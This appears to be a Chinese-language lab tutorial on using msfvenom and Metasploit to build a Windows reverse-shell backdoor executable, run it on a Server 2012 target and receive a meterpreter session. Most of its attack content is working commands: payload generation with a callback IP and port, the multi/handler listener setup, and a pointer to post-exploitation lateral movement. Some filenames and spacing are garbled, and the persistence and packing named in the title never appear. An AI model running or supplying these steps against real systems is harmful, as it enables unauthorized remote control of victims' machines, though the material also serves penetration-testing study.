msfvenom木马持久化 (msfvenom木马加壳)

msfvenom木马持久化,msfvenom木马加壳

0x01 知识点

MSF工具的利用 MSF生成Windows木马后门

0x02 实验环境:

攻击机kali 2022(ip:192.168.190.131)

靶机Server 2012 (ip:192.168.190.132)

0x03 Windows后门木马实验

1.生成Windows后门

在攻击机kaili 2022中输入:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.190.131LPORT=5555 -f exe > /tmp/shell*ex.e** 

(生成一个名为shell*ex.e**的msf后门文件)

msfvenom木马持久化,msfvenom木马加壳

2.配置、监听、执行

msfconsole #启动msf
use exploit/multi/handler #使用监听模块
set payload windows/meterpreter/reverse_tcp #使用和木马相同的payload
set lhost 192.168.190.131 #kali的ip
set lport 5555 #木马的端口
run #执行

msfvenom木马持久化,msfvenom木马加壳

3.目标机器执行木马后门文件shell*ex.e**

将shell*ex.e**木马文件拷贝至靶机server 2012(ip:192.168.190.132)中然后执行。

msfvenom木马持久化,msfvenom木马加壳

4.目标机器接受MSF会话

Msf变成meterpreter证明执行成功,输入sysinfo验证

msfvenom木马持久化,msfvenom木马加壳

0x04 横向渗透

后渗透阶段可以执行命令获取内网信息等